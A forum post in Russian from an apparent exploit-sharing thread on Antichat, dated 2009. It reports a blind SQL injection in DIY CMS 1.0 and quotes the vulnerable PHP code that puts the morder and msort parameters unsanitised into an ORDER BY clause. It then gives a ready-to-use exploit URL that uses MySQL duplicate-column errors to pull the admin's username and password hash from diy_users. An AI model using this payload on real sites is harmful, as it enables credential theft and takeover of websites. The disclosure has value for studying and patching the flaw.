Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

DIY CMS bSQL inj
  #8  
Старый 21.12.2009, 16:28
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию DIY CMS bSQL inj
DIY CMS (Do It Yourself cms)
Web site : http://www.diy-cms.com
Version : 1.0

Blind SQL Injection

Vuln file: /modules/users/index.php [str:48]
PHP код:
 /*...*/
     if(isset($diy->get['morder'])) 
    {
    $order $diy->get['morder'];
    }
    else
    {
      $order "userid";
    }
    
    if (isset($diy->get[msort])) 
    {
        $sort $diy->get[msort];
    }
    else
    {
         $sort DESC;
    }
 /*...*/
     $result   $diy->query("SELECT * FROM diy_users WHERE userid > '0' and userid != '$diy->Guestid' and activated = 'approved' ORDER BY $order $sort LIMIT $start,$upp"); 
 /*...*/ 
Если версия MySQL=>5.0.12, можно получить данные из ошибки Duplicate column name
Exploit:
Код:
http://[host]/[path]/mod.php?mod=users&morder=1+and+(select+*+from+(select+*+from+(select+name_const((select+concat_ws(0x3a,username,password)+from+diy_users+where+userid=1),1)a)b+join+(select+name_const((select+concat_ws(0x3a,username,password)+from+diy_users+where+userid=1),1)c)d)e)
*так же уязвим параметр msort
 
Ответить с цитированием